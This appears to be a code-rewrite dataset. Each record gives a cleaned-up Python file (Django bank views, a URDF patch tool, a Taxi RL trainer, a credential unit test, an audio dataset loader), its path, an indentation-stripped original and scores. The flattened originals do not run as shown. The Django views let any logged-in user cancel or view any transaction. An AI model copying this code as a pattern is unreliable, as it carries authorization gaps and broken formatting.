                # transaction.atomic(), so a failure part-way leaves the
                # balances inconsistent -- confirm/fix upstream.
                subtracted_amount = (
                    transaction.amount / form.cleaned_data["bank_account"].count()
                )
                for account in form.cleaned_data["bank_account"]:
                    account.amount -= subtracted_amount
                    account.save()
            transaction.save()
            form.save_m2m()
            return redirect("list_bank_accounts")
    return render(request, "bank_account/transaction_form.html", {"form": form})
@login_required
def cancel_transaction(request, pk):
    """Reverse transaction *pk*.

    Refunds each source account its equal share, debits the recipient
    account, then marks the transaction inactive with a zero amount.
    """
    transaction = get_object_or_404(Transaction, pk=pk)
    # Each source account gets back an equal share of the original amount.
    returned_amount = transaction.amount / transaction.bank_account.all().count()
    for bank_account in transaction.bank_account.all():
        bank_account.amount += returned_amount
        bank_account.save()
    if transaction.recipient_bank_account:
        transaction.recipient_bank_account.amount -= transaction.amount
        transaction.recipient_bank_account.save()
    transaction.status = False
    # Zero out the amount (equivalent to `transaction.amount = 0`).
    transaction.amount -= transaction.amount
    transaction.save()
    # NOTE(review): redirects to URL name 'list_transaction' while the view
    # below is named list_transactions -- confirm the URLconf name matches.
    return redirect("list_transaction")
@login_required
def list_transactions(request):
    """List the current user's transactions with optional filtering.

    Supported GET parameters: ``start_date`` / ``end_date`` (created_at
    range), ``amount`` (substring match) and ``search_term`` (sender or
    recipient username, or bank-account id). Paginated 10 per page.
    """
    queryset = Transaction.objects.all().order_by("created_at")
    if not request.user.is_anonymous:
        queryset = queryset.filter(sender=request.user)
    # Each date bound is applied independently; supplying both yields the
    # closed range. (The original re-applied the combined filter a second
    # time when both were present, which was redundant.)
    if request.GET.get("start_date"):
        queryset = queryset.filter(created_at__gte=request.GET.get("start_date"))
    if request.GET.get("end_date"):
        queryset = queryset.filter(created_at__lte=request.GET.get("end_date"))
    if request.GET.get("amount"):
        # NOTE(review): icontains on a numeric column does a string match;
        # confirm this loose matching is intended.
        queryset = queryset.filter(amount__icontains=request.GET.get("amount"))
    if request.GET.get("search_term"):
        search_term = request.GET.get("search_term")
        queryset = queryset.filter(
            Q(sender__username__icontains=search_term)
            | Q(recipient__username__icontains=search_term)
            | Q(bank_account__id__icontains=search_term)
        )
    paginator = Paginator(queryset, 10)
    page_number = request.GET.get("page")
    page_obj = paginator.get_page(page_number)
    return render(
        request, "bank_account/transactions_list.html", {"page_obj": page_obj}
    )
@login_required
def transaction_detail(request, pk):
    """Render the detail page for one transaction (404 when missing)."""
    return render(
        request,
        "bank_account/transaction_detail.html",
        {"transaction": get_object_or_404(Transaction, pk=pk)},
    )
@login_required
def list_bank_accounts(request):
    """List the bank accounts owned by the current user."""
    owner = None if request.user.is_anonymous else request.user
    accounts = BankAccount.objects.filter(owner=owner)
    return render(
        request,
        "bank_account/bank_accounts.html",
        {"bank_accounts": accounts},
    )
@login_required
def create_bank_account(request):
    """Create a bank account owned by the current user.

    On valid POST saves the account and redirects to the user list;
    otherwise renders the form (bound on an invalid POST).
    """
    if request.method == "POST":
        form = BankAccountForm(request.POST)
        if form.is_valid():
            bank_account = form.save(commit=False)
            bank_account.owner = request.user
            # The original re-assigned bank_account.amount from
            # cleaned_data here; form.save() already populated it, so the
            # redundant assignment was dropped.
            bank_account.save()
            return redirect("list_users")
    else:
        # GET: unbound form (the original needlessly built a bound form).
        form = BankAccountForm()
    return render(request, "bank_account/create_bank_account.html", {"form": form})
@login_required
def bank_account_detail(request, pk):
queryset = get_object_or_404(BankAccount, pk=pk)
context = {"bank_account": queryset}
return render(request, "bank_account/bank_account_detail.html", context) | bank_account_app/bank_account/views.py | from django.http import HttpResponseRedirect
from django.shortcuts import get_object_or_404, redirect, render
from django.contrib.auth.models import User
from django.views import View
from .models import BankAccount, Transaction
from .forms import BankAccountForm, RegistrationForm, TransactionForm
from django.core.paginator import Paginator
from django.db.models import Q
from django.contrib.auth import authenticate, login
from django.contrib.auth.decorators import login_required
# Create your views here.
class LoginView(View):
def post(self, request):
username = request.POST["username"]
password = request.POST["password"]
user = authenticate(request, username=username, password=password)
if user is not None and user.is_staff:
login(request, user)
return HttpResponseRedirect("/admin")
if user is not None and not user.is_staff:
login(request, user)
return HttpResponseRedirect("/")
return render(request, "bank_account/login.html")
def get(self, request):
return render(request, "bank_account/login.html")
def user_create(request):
registration_form = RegistrationForm(request.POST)
if request.method == "POST":
if registration_form.is_valid():
username = registration_form.cleaned_data["username"]
password = registration_form.cleaned_data["password"]
first_name = registration_form.cleaned_data["first_name"]
last_name = registration_form.cleaned_data["last_name"]
email = registration_form.cleaned_data["email"]
user = User.objects.create_user(username, email, password)
user.first_name = first_name
user.last_name = last_name
user.password2 = password
user.save()
return redirect("list_bank_accounts")
else:
registration_form = RegistrationForm()
return render(
request,
"bank_account/registration.html",
{
"registration_form": registration_form,
},
)
@login_required
def list_users(request):
queryset = User.objects.all().order_by("-id")
if not request.user.is_anonymous:
queryset = queryset.exclude(username=request.user.username)
if request.GET.get("search_term"):
search_term = request.GET.get("search_term")
queryset = queryset.filter(
Q(username__icontains=search_term)
| Q(email__icontains=search_term)
| Q(first_name__icontains=search_term)
| Q(last_name__icontains=search_term)
)
paginator = Paginator(queryset, 10)
page_number = request.GET.get("page")
page_obj = paginator.get_page(page_number)
context = {
"users": page_obj,
}
return render(request, "bank_account/users.html", context)
@login_required
def make_transaction(request, pk):
bank_account = get_object_or_404(BankAccount, pk=pk)
current_user = request.user if not request.user.is_anonymous else None
form = TransactionForm(data=request.POST, user=current_user)
if request.method == "POST":
if form.is_valid():
transaction = form.save(commit=False)
transaction.sender = current_user
transaction.recipient = bank_account.owner
transaction.amount = form.cleaned_data["amount"]
transaction.recipient_bank_account = bank_account
if transaction.amount:
bank_account.amount += transaction.amount
bank_account.save()
subtracted_amount = (
transaction.amount / form.cleaned_data["bank_account"].count()
)
for account in form.cleaned_data["bank_account"]:
account.amount -= subtracted_amount
account.save()
transaction.save()
form.save_m2m()
return redirect("list_bank_accounts")
return render(request, "bank_account/transaction_form.html", {"form": form})
@login_required
def cancel_transaction(request, pk):
transaction = get_object_or_404(Transaction, pk=pk)
returned_amount = transaction.amount / transaction.bank_account.all().count()
for bank_account in transaction.bank_account.all():
bank_account.amount += returned_amount
bank_account.save()
if transaction.recipient_bank_account:
transaction.recipient_bank_account.amount -= transaction.amount
transaction.recipient_bank_account.save()
transaction.status = False
transaction.amount -= transaction.amount
transaction.save()
return redirect("list_transaction")
@login_required
def list_transactions(request):
queryset = Transaction.objects.all().order_by("created_at")
if not request.user.is_anonymous:
queryset = queryset.filter(sender=request.user)
if request.GET.get("start_date"):
queryset = queryset.filter(created_at__gte=request.GET.get("start_date"))
if request.GET.get("end_date"):
queryset = queryset.filter(created_at__lte=request.GET.get("end_date"))
if request.GET.get("start_date") and request.GET.get("end_date"):
queryset = queryset.filter(
created_at__gte=request.GET.get("start_date"),
created_at__lte=request.GET.get("end_date"),
)
if request.GET.get("amount"):
queryset = queryset.filter(amount__icontains=request.GET.get("amount"))
if request.GET.get("search_term"):
search_term = request.GET.get("search_term")
queryset = queryset.filter(
Q(sender__username__icontains=search_term)
| Q(recipient__username__icontains=search_term)
| Q(bank_account__id__icontains=search_term)
)
paginator = Paginator(queryset, 10)
page_number = request.GET.get("page")
page_obj = paginator.get_page(page_number)
return render(
request, "bank_account/transactions_list.html", {"page_obj": page_obj}
)
@login_required
def transaction_detail(request, pk):
transaction = get_object_or_404(Transaction, pk=pk)
context = {"transaction": transaction}
return render(request, "bank_account/transaction_detail.html", context)
@login_required
def list_bank_accounts(request):
current_user = request.user if not request.user.is_anonymous else None
queryset = BankAccount.objects.filter(owner=current_user)
context = {"bank_accounts": queryset}
return render(request, "bank_account/bank_accounts.html", context)
@login_required
def create_bank_account(request):
form = BankAccountForm(request.POST)
if request.method == "POST":
if form.is_valid():
bank_account = form.save(commit=False)
bank_account.owner = request.user
bank_account.amount = form.cleaned_data["amount"]
bank_account.save()
return redirect("list_users")
else:
form = BankAccountForm()
return render(request, "bank_account/create_bank_account.html", {"form": form})
@login_required
def bank_account_detail(request, pk):
queryset = get_object_or_404(BankAccount, pk=pk)
context = {"bank_account": queryset}
return render(request, "bank_account/bank_account_detail.html", context) | 0.434221 | 0.076511 |
import argparse
from urdf_parser_py.urdf import URDF
import yaml
import sys
def findJointByName(robot, name):
    """Return the joint of *robot* whose name equals *name*, else None."""
    matches = (joint for joint in robot.joints if joint.name == name)
    return next(matches, None)
def jointDiff(original, new):
    """Compare the origins of two URDF joints.

    Only the origin (xyz translation and rpy rotation) is considered.
    A missing origin, or a missing/None xyz/rpy field, is treated as
    [0, 0, 0] -- on *either* joint (the original code assumed
    ``new.origin`` always existed and crashed otherwise).

    Returns None when the origins match, otherwise a dict carrying the
    differing new "xyz" and/or "rpy" values.
    """
    def _origin_field(joint, field):
        # Default to zeros when the origin or the field is absent/None.
        if hasattr(joint, "origin") and hasattr(joint.origin, field):
            return getattr(joint.origin, field) or [0, 0, 0]
        return [0, 0, 0]

    pos_original = _origin_field(original, "xyz")
    rpy_original = _origin_field(original, "rpy")
    pos_new = _origin_field(new, "xyz")
    rpy_new = _origin_field(new, "rpy")

    pos_diff = None
    if (pos_original[0] != pos_new[0]
            or pos_original[1] != pos_new[1]
            or pos_original[2] != pos_new[2]):
        print("old: ", pos_original)
        print("new: ", pos_new)
        pos_diff = pos_new

    rpy_diff = None
    if (rpy_original[0] != rpy_new[0]
            or rpy_original[1] != rpy_new[1]
            or rpy_original[2] != rpy_new[2]):
        print("old: ", rpy_original)
        print("new: ", rpy_new)
        rpy_diff = rpy_new

    if not pos_diff and not rpy_diff:
        return None
    diff = {}
    if pos_diff:
        diff["xyz"] = pos_diff
    if rpy_diff:
        diff["rpy"] = rpy_diff
    return diff
def runDiff(original_file, new_file, output_file):
    """Write a YAML diff of joint origins between two URDF files.

    For every joint present in both files whose origin differs, the new
    xyz/rpy values are recorded under the joint's name. The diff is
    written to *output_file* and also printed to stdout.
    """
    original_robot = URDF.from_xml_file(original_file)
    new_robot = URDF.from_xml_file(new_file)
    # only joint and link are considered
    diffs = dict()
    for j in original_robot.joints:
        new_j = findJointByName(new_robot, j.name)
        # check origin difference
        if new_j:
            diff = jointDiff(j, new_j)
            if diff:
                diffs[j.name] = diff
    with open(output_file, "w") as f:
        f.write(yaml.dump(diffs))
    print(yaml.dump(diffs))
def runPatch(input_file, patch_yaml, output_file):
    """Apply an origin patch (as produced by runDiff) to a URDF file.

    input_file: URDF to modify.
    patch_yaml: YAML mapping joint name -> {"xyz": [...], "rpy": [...]}.
    output_file: destination path; when falsy the patched URDF is printed
        to stdout instead.
    """
    input_robot = URDF.from_xml_file(input_file)
    # safe_load instead of load: the patch is plain data, and yaml.load
    # without an explicit Loader is deprecated and can instantiate
    # arbitrary objects. The file handle is also closed deterministically
    # now (the original leaked it).
    with open(patch_yaml) as f:
        patch_param = yaml.safe_load(f)
    for joint_name, diff in patch_param.items():
        joint = input_robot.joint_map[joint_name]
        if "xyz" in diff:
            joint.origin.xyz = diff["xyz"]
        if "rpy" in diff:
            joint.origin.rpy = diff["rpy"]
    if output_file:
        with open(output_file, "w") as f:
            f.write(input_robot.to_xml_string())
    else:
        print(input_robot.to_xml_string())
def parser():
    """Build the argparse parser for the urdf diff/patch command-line tool."""
    p = argparse.ArgumentParser(description="Get and apply urdf patch")
    p.add_argument("mode", help="diff or patch")
    p.add_argument("arg0", help="""If mode is diff, specify original urdf.
    If mode is patch, specify original urdf.""")
    p.add_argument("arg1", help="""If mode is diff, specify new urdf.
    If mode is patch, specify patch yaml file.
    """)
    p.add_argument("output", help="output file. You can omit this argument in diff mode and in that case the new urdf is output in STDOUT.", nargs="?")
    return p
if __name__ == "__main__":
p = parser()
args = p.parse_args()
if args.mode == "diff":
if not args.output:
p.print_help()
sys.exit(1)
runDiff(args.arg0, args.arg1, args.output)
elif args.mode == "patch":
runPatch(args.arg0, args.arg1, args.output)
else:
raise Exception("unknown mode %s" % (args.mode)) | euscollada/scripts/urdf_patch.py | import argparse
from urdf_parser_py.urdf import URDF
import yaml
import sys
def findJointByName(robot, name):
for j in robot.joints:
if j.name == name:
return j
return None
def jointDiff(original, new):
"""
only take origin into account
"""
if hasattr(original, "origin") and hasattr(original.origin, "xyz"):
pos_original = original.origin.xyz or [0, 0, 0]
else:
pos_original = [0, 0, 0]
if hasattr(original, "origin") and hasattr(original.origin, "rpy"):
rpy_original = original.origin.rpy or [0, 0, 0]
else:
rpy_original = [0, 0, 0]
pos_new = new.origin.xyz or [0, 0, 0]
rpy_new = new.origin.rpy or [0, 0, 0]
if (pos_original[0] == pos_new[0] and
pos_original[1] == pos_new[1] and
pos_original[2] == pos_new[2]):
pos_diff = None
else:
print("old: ", pos_original)
print("new: ", pos_new)
pos_diff = pos_new
if (rpy_original[0] == rpy_new[0] and
rpy_original[1] == rpy_new[1] and
rpy_original[2] == rpy_new[2]):
rpy_diff = None
else:
print("old: ", rpy_original)
print("new: ", rpy_new)
rpy_diff = rpy_new
if not pos_diff and not rpy_diff:
return None
elif pos_diff and rpy_diff:
return {"xyz": pos_diff, "rpy": rpy_diff}
elif pos_diff:
return {"xyz": pos_diff}
elif rpy_diff:
return {"rpy": rpy_diff}
return None
def runDiff(original_file, new_file, output_file):
original_robot = URDF.from_xml_file(original_file)
new_robot = URDF.from_xml_file(new_file)
# only joint and link are considered
diffs = dict()
for j in original_robot.joints:
new_j = findJointByName(new_robot, j.name)
# check origin difference
if new_j:
diff = jointDiff(j, new_j)
if diff:
diffs[j.name] = diff
with open(output_file, "w") as f:
f.write(yaml.dump(diffs))
print(yaml.dump(diffs))
def runPatch(input_file, patch_yaml, output_file):
input_robot = URDF.from_xml_file(input_file)
patch_param = yaml.load(open(patch_yaml))
for joint_name in patch_param.keys():
diff = patch_param[joint_name]
if "xyz" in diff:
j = input_robot.joint_map[joint_name]
j.origin.xyz = diff["xyz"]
if "rpy" in diff:
j = input_robot.joint_map[joint_name]
j.origin.rpy = diff["rpy"]
if output_file:
with open(output_file, "w") as f:
f.write(input_robot.to_xml_string())
else:
print(input_robot.to_xml_string())
def parser():
p = argparse.ArgumentParser(description="Get and apply urdf patch")
p.add_argument("mode", help="diff or patch")
p.add_argument("arg0", help="""If mode is diff, specify original urdf.
If mode is patch, specify original urdf.""")
p.add_argument("arg1", help="""If mode is diff, specify new urdf.
If mode is patch, specify patch yaml file.
""")
p.add_argument("output", help="output file. You can omit this argument in diff mode and in that case the new urdf is output in STDOUT.", nargs="?")
return p
if __name__ == "__main__":
    p = parser()
    args = p.parse_args()
    if args.mode == "diff":
        # diff mode requires an explicit output file.
        if not args.output:
            p.print_help()
            sys.exit(1)
        runDiff(args.arg0, args.arg1, args.output)
    elif args.mode == "patch":
        runPatch(args.arg0, args.arg1, args.output)
    else:
        # Trailing dataset artifact removed from the original final line.
        raise Exception("unknown mode %s" % (args.mode))
from policies import TabularPolicy, DQNPolicy, IntentionPolicy, IntentionAblatedPolicy
from tabular_class import QTabularRLModel, MCTabularRLModel
from deep_class import DQNModel, IntentionModel, IntentionAblatedModel
import argparse
import numpy as np
import gym
from wrappers import DiscretizedObservationWrapper, TaxiObservationWrapper
# Command-line interface for training a tabular or deep policy on Taxi-v3.
parser = argparse.ArgumentParser()
parser.add_argument("--policy", type=str, help="Policy to train. One of [MC/Q/DQN].")
parser.add_argument("--load", type=str, help="Path to model to load.")
parser.add_argument("--ckpt", type=str, help="Path to model checkpoint.")
parser.add_argument("--seed", type=int, help="Random seed.")
parser.add_argument("--train", action="store_true", help="Training mode.")
args = parser.parse_args()

env = gym.make('Taxi-v3')

if args.policy == 'Q':
    model = QTabularRLModel(
        policy=TabularPolicy,
        env=env,
        learning_rate=0.1,
        gamma=1.,
        exploration_type="linear",
        exploration_frac=0.999,
        exploration_initial_eps=1.,
        exploration_final_eps=0.05,
        seed=args.seed,
        intent=True)
elif args.policy == 'MC':
    model = MCTabularRLModel(
        policy=TabularPolicy,
        env=env,
        learning_rate=0.1,
        gamma=1.,
        exploration_type="linear",
        exploration_frac=0.999,
        exploration_initial_eps=1.,
        exploration_final_eps=0.05,
        seed=args.seed,
        intent=True)
elif args.policy == 'DQN':
    # NOTE(review): despite the flag name, this instantiates the
    # intention-ablated model, not DQNModel -- confirm that is intended.
    env = TaxiObservationWrapper(env)
    model = IntentionAblatedModel(
        policy=IntentionAblatedPolicy,
        env=env,
        learning_rate=0.0001,
        gamma=1.,
        buffer_size=10000,
        exploration_type="linear",
        exploration_frac=0.999,
        exploration_initial_eps=1.,
        exploration_final_eps=0.05,
        seed=args.seed)
else:
    # Previously an unrecognized --policy fell through and crashed later
    # with NameError on `model`; fail fast with a clear message instead.
    raise ValueError("Unknown --policy %r; expected one of MC, Q, DQN." % args.policy)

model.set_random_seed(args.seed)
if args.load:
    model.load(args.load)
model.learn(total_episodes=5000, ckpt_interval=100, ckpt_path=args.ckpt) | train_taxi.py | from policies import TabularPolicy, DQNPolicy, IntentionPolicy, IntentionAblatedPolicy
from tabular_class import QTabularRLModel, MCTabularRLModel
from deep_class import DQNModel, IntentionModel, IntentionAblatedModel
import argparse
import numpy as np
import gym
from wrappers import DiscretizedObservationWrapper, TaxiObservationWrapper
parser = argparse.ArgumentParser()
parser.add_argument("--policy", type=str, help="Policy to train. One of [MC/Q/DQN].")
parser.add_argument("--load", type=str, help="Path to model to load.")
parser.add_argument("--ckpt", type=str, help="Path to model checkpoint.")
parser.add_argument("--seed", type=int, help="Random seed.")
parser.add_argument("--train", action="store_true", help="Training mode.")
args = parser.parse_args()
env = gym.make('Taxi-v3')
if args.policy in ["MC", "Q"]:
if args.policy == 'Q':
model = QTabularRLModel(
policy=TabularPolicy,
env=env,
learning_rate=0.1,
gamma=1.,
exploration_type="linear",
exploration_frac=0.999,
exploration_initial_eps=1.,
exploration_final_eps=0.05,
seed=args.seed,
intent=True)
if args.policy == 'MC':
model = MCTabularRLModel(
policy=TabularPolicy,
env=env,
learning_rate=0.1,
gamma=1.,
exploration_type="linear",
exploration_frac=0.999,
exploration_initial_eps=1.,
exploration_final_eps=0.05,
seed=args.seed,
intent=True)
if args.policy == 'DQN':
env = TaxiObservationWrapper(env)
model = IntentionAblatedModel(
policy=IntentionAblatedPolicy,
env=env,
learning_rate=0.0001,
gamma=1.,
buffer_size=10000,
exploration_type="linear",
exploration_frac=0.999,
exploration_initial_eps=1.,
exploration_final_eps=0.05,
seed=args.seed)
model.set_random_seed(args.seed)
if args.load:
model.load(args.load)
if args.train:
model.learn(total_episodes=5000, ckpt_interval=100, ckpt_path=args.ckpt) | 0.589362 | 0.262975 |
import unittest #importing the unittest module
from credential import Credential #importing the credential class
class TestCredential(unittest.TestCase):
    '''
    Test case defines test cases for the credential class behaivors
    '''
    def setUp(self):
        '''
        set up to run before each test case
        '''
        self.new_credential = Credential('Abdul','Instagram','z.i.z.o.u1','@!#') # create new credential object
    def test_init(self):
        '''
        test_init to test if the object is initialized properly
        '''
        self.assertEqual(self.new_credential.name,'Abdul')
        self.assertEqual(self.new_credential.social_media,'Instagram')
        self.assertEqual(self.new_credential.user_name,'z.i.z.o.u1')
        self.assertEqual(self.new_credential.password,'@!#')
    def test_save_credential(self):
        '''
        test_save_credential test case to test if the user credential is saved into the credential_list
        '''
        self.new_credential.save_credential() #save new user credential
        # Relies on tearDown resetting Credential.credential_list between tests.
        self.assertEqual(len(Credential.credential_list),1)
    def tearDown(self):
        '''
        tearDown method that does clean up after each test case is run
        '''
        # Reset the class-level list so counts in other tests stay accurate.
        Credential.credential_list = []
    def test_save_multiple_credential(self):
        '''
        test_save_multiple_credential to check if we can save multiple user credential
        '''
        self.new_credential.save_credential()
        test_credential = Credential('Majid','Snapchat','jidmore','abcd')
        test_credential.save_credential()
        self.assertEqual(len(Credential.credential_list),2)
    def test_delete_credential(self):
        '''
        test_delete_credential to test if we can remove a user credential from our credential_list
        '''
        self.new_credential.save_credential()
        test_credential = Credential('Majid','Snapchat','jidmore','abcd')
        test_credential.save_credential()
        self.new_credential.delete_credential() #Deleting a user credential object
        self.assertEqual(len(Credential.credential_list),1)
    def test_find_credential_by_user_name(self):
        '''
        test to check if we can find a user credential by the username and displays information
        '''
        self.new_credential.save_credential()
        test_credential = Credential('Majid','Snapchat','jidmore','abcd')
        test_credential.save_credential()
        found_credential = Credential.find_by_user_name('jidmore')
        self.assertEqual(found_credential.social_media,test_credential.social_media)
    def test_display_all_credential(self):
        '''
        method that returns a list of user credentials saved
        '''
        self.assertEqual(Credential.display_credentials(),Credential.credential_list)
if __name__ == '__main__':
unittest.main() | credential_test.py | import unittest #importing the unittest module
from credential import Credential #importing the credential class
class TestCredential(unittest.TestCase):
'''
Test case defines test cases for the credential class behaivors
'''
def setUp(self):
'''
set up to run before each test case
'''
self.new_credential = Credential('Abdul','Instagram','z.i.z.o.u1','@!#') # create new credential object
def test_init(self):
'''
test_init to test if the object is initialized properly
'''
self.assertEqual(self.new_credential.name,'Abdul')
self.assertEqual(self.new_credential.social_media,'Instagram')
self.assertEqual(self.new_credential.user_name,'z.i.z.o.u1')
self.assertEqual(self.new_credential.password,'@!#')
def test_save_credential(self):
'''
test_save_credential test case to test if the user credential is saved into the credential_list
'''
self.new_credential.save_credential() #save new user credential
self.assertEqual(len(Credential.credential_list),1)
def tearDown(self):
'''
tearDown method that does clean up after each test case is run
'''
Credential.credential_list = []
def test_save_multiple_credential(self):
'''
test_save_multiple_credential to check if we can save multiple user credential
'''
self.new_credential.save_credential()
test_credential = Credential('Majid','Snapchat','jidmore','abcd')
test_credential.save_credential()
self.assertEqual(len(Credential.credential_list),2)
def test_delete_credential(self):
'''
test_delete_credential to test if we can remove a user credential from our credential_list
'''
self.new_credential.save_credential()
test_credential = Credential('Majid','Snapchat','jidmore','abcd')
test_credential.save_credential()
self.new_credential.delete_credential() #Deleting a user credential object
self.assertEqual(len(Credential.credential_list),1)
def test_find_credential_by_user_name(self):
'''
test to check if we can find a user credential by the username and displays information
'''
self.new_credential.save_credential()
test_credential = Credential('Majid','Snapchat','jidmore','abcd')
test_credential.save_credential()
found_credential = Credential.find_by_user_name('jidmore')
self.assertEqual(found_credential.social_media,test_credential.social_media)
def test_display_all_credential(self):
'''
method that returns a list of user credentials saved
'''
self.assertEqual(Credential.display_credentials(),Credential.credential_list)
if __name__ == '__main__':
unittest.main() | 0.395951 | 0.374162 |
from matplotlib import collections
import json
import os
import copy
# math and random are used below (math.ceil, random.uniform) but were not
# explicitly imported; they may have leaked in via the star import, which
# is fragile -- import them explicitly.
import math
import random
import torch
from torchvision import transforms
import numpy as np
from tqdm import tqdm
from random import sample
import torchaudio
import logging
# NOTE: this intentionally shadows `matplotlib.collections` imported above.
import collections
from glob import glob
import sys
import albumentations
sys.path.insert(0, '.')  # nopep8
from train import instantiate_from_config
from specvqgan.data.transforms import *
torchaudio.set_audio_backend("sox_io")
logger = logging.getLogger(f'main.{__name__}')

# Audio sample rate in Hz used throughout this dataset pipeline.
SR = 22050
# Frame rate of the extracted video features.
FPS = 15
# NOTE(review): usage not visible in this chunk; presumably caps retries
# when rejection-sampling a clip -- confirm against the rest of the file.
MAX_SAMPLE_ITER = 10
def non_negative(x):
    """Clamp *x* at zero, then round to the nearest integer."""
    clamped = max(0, x)
    return int(np.round(clamped, 0))
def get_GH_data_identifier(video_name, start_idx, split='_'):
    """Join a video name and a hit start index into one identifier string."""
    if isinstance(start_idx, str):
        suffix = start_idx
    elif isinstance(start_idx, int):
        suffix = str(start_idx)
    else:
        # Any other index type is unsupported.
        raise NotImplementedError
    return video_name + split + suffix
class Crop(object):
    """Crop the 'image' (and optional 'cond_image') entries of an item.

    With *cropped_shape* = (mel_num, spec_len), a random or center crop of
    that size is applied; with None the item passes through unchanged.
    """

    def __init__(self, cropped_shape=None, random_crop=False):
        self.cropped_shape = cropped_shape
        if cropped_shape is None:
            # Identity transform: echo the kwargs back untouched.
            self.preprocessor = lambda **kwargs: kwargs
        else:
            mel_num, spec_len = cropped_shape
            self.cropper = (albumentations.RandomCrop if random_crop
                            else albumentations.CenterCrop)
            self.preprocessor = albumentations.Compose(
                [self.cropper(mel_num, spec_len)])

    def __call__(self, item):
        item['image'] = self.preprocessor(image=item['image'])['image']
        if 'cond_image' in item:
            item['cond_image'] = self.preprocessor(
                image=item['cond_image'])['image']
        return item
class CropImage(Crop):
    """Alias of Crop used for spectrogram 'image' entries."""
    def __init__(self, *crop_args):
        super().__init__(*crop_args)
class CropFeats(Crop):
    """Crop variant operating on the 'feature' entry instead of 'image'."""
    def __init__(self, *crop_args):
        super().__init__(*crop_args)
    def __call__(self, item):
        # Note: unlike Crop.__call__, only 'feature' is cropped here.
        item['feature'] = self.preprocessor(image=item['feature'])['image']
        return item
class CropCoords(Crop):
    """Crop variant operating on the 'coord' entry instead of 'image'."""
    def __init__(self, *crop_args):
        super().__init__(*crop_args)
    def __call__(self, item):
        # Note: unlike Crop.__call__, only 'coord' is cropped here.
        item['coord'] = self.preprocessor(image=item['coord'])['image']
        return item
class ResampleFrames(object):
    """Subsample a fixed number of frame features, evenly spaced in time.

    feat_sample_size: number of frames to keep.
    times_to_repeat_after_resample: when > 1, each kept frame is repeated
        this many times after resampling (abc -> aaaabbbbcccc).
    """

    def __init__(self, feat_sample_size, times_to_repeat_after_resample=None):
        self.feat_sample_size = feat_sample_size
        self.times_to_repeat_after_resample = times_to_repeat_after_resample

    def __call__(self, item):
        feat_len = item['feature'].shape[0]
        ## resample
        assert feat_len >= self.feat_sample_size
        # evenly spaced points (abcdefghkl -> aoooofoooo)
        # dtype=int instead of the np.int alias, which was deprecated in
        # NumPy 1.20 and removed in 1.24 (AttributeError on modern NumPy).
        idx = np.linspace(0, feat_len, self.feat_sample_size, dtype=int, endpoint=False)
        # xoooo xoooo -> ooxoo ooxoo
        shift = feat_len // (self.feat_sample_size + 1)
        idx = idx + shift
        ## repeat after resampling (abc -> aaaabbbbcccc)
        if self.times_to_repeat_after_resample is not None and self.times_to_repeat_after_resample > 1:
            idx = np.repeat(idx, self.times_to_repeat_after_resample)
        item['feature'] = item['feature'][idx, :]
        return item
class GreatestHitSpecs(torch.utils.data.Dataset):
def __init__(self, split, spec_dir_path, spec_len, random_crop, mel_num,
spec_crop_len, L=2.0, rand_shift=False, spec_transforms=None, splits_path='./data',
meta_path='./data/info_r2plus1d_dim1024_15fps.json'):
super().__init__()
self.split = split
self.specs_dir = spec_dir_path
self.spec_transforms = spec_transforms
self.splits_path = splits_path
self.meta_path = meta_path
self.spec_len = spec_len
self.rand_shift = rand_shift
self.L = L
self.spec_take_first = int(math.ceil(860 * (L / 10.) / 32) * 32)
self.spec_take_first = 860 if self.spec_take_first > 860 else self.spec_take_first
greatesthit_meta = json.load(open(self.meta_path, 'r'))
unique_classes = sorted(list(set(ht for ht in greatesthit_meta['hit_type'])))
self.label2target = {label: target for target, label in enumerate(unique_classes)}
self.target2label = {target: label for label, target in self.label2target.items()}
self.video_idx2label = {
get_GH_data_identifier(greatesthit_meta['video_name'][i], greatesthit_meta['start_idx'][i]):
greatesthit_meta['hit_type'][i] for i in range(len(greatesthit_meta['video_name']))
}
self.available_video_hit = list(self.video_idx2label.keys())
self.video_idx2path = {
vh: os.path.join(self.specs_dir,
vh.replace('_', '_denoised_') + '_' + self.video_idx2label[vh].replace(' ', '_') +'_mel.npy')
for vh in self.available_video_hit
}
self.video_idx2idx = {
get_GH_data_identifier(greatesthit_meta['video_name'][i], greatesthit_meta['start_idx'][i]):
i for i in range(len(greatesthit_meta['video_name']))
}
split_clip_ids_path = os.path.join(splits_path, f'greatesthit_{split}.json')
if not os.path.exists(split_clip_ids_path):
raise NotImplementedError()
clip_video_hit = json.load(open(split_clip_ids_path, 'r'))
self.dataset = clip_video_hit
spec_crop_len = self.spec_take_first if self.spec_take_first <= spec_crop_len else spec_crop_len
self.spec_transforms = transforms.Compose([
CropImage([mel_num, spec_crop_len], random_crop),
transforms.RandomApply([FrequencyMasking(freq_mask_param=20)], p=0),
transforms.RandomApply([TimeMasking(time_mask_param=int(32 * self.L))], p=0)
])
self.video2indexes = {}
for video_idx in self.dataset:
video, start_idx = video_idx.split('_')
if video not in self.video2indexes.keys():
self.video2indexes[video] = []
self.video2indexes[video].append(start_idx)
for video in self.video2indexes.keys():
if len(self.video2indexes[video]) == 1: # given video contains only one hit
self.dataset.remove(
get_GH_data_identifier(video, self.video2indexes[video][0])
)
    def __len__(self):
        # Number of usable clips in this split (after single-hit videos were dropped).
        return len(self.dataset)
    def __getitem__(self, idx):
        """Load one mel-spectrogram clip.

        Returns a dict with 'image' (spectrogram rescaled to [-1, 1] and cut to
        the first `spec_take_first` frames), 'file_path', class 'label' and the
        integer 'target' for that label.
        """
        item = {}
        video_idx = self.dataset[idx]
        spec_path = self.video_idx2path[video_idx]
        spec = np.load(spec_path) # (80, 860)
        if self.rand_shift:
            # Shift start by up to 0.5 of a 1-s window.
            # NOTE(review): needs `import random` at file level (only `sample` is imported).
            shift = random.uniform(0, 0.5)
            spec_shift = int(shift * spec.shape[1] // 10)
            # Since only the first second is used
            spec = np.roll(spec, -spec_shift, 1)
        # concat spec outside dataload
        item['image'] = 2 * spec - 1 # (80, 860)  # assumes mel values in [0, 1] — TODO confirm
        item['image'] = item['image'][:, :self.spec_take_first]
        item['file_path'] = spec_path
        item['label'] = self.video_idx2label[video_idx]
        item['target'] = self.label2target[item['label']]
        if self.spec_transforms is not None:
            item = self.spec_transforms(item)
        return item
class GreatestHitSpecsTrain(GreatestHitSpecs):
    """Train-split wrapper: forwards the config dict to GreatestHitSpecs."""
    def __init__(self, specs_dataset_cfg):
        super().__init__('train', **specs_dataset_cfg)
class GreatestHitSpecsValidation(GreatestHitSpecs):
    """Validation-split wrapper: forwards the config dict to GreatestHitSpecs."""
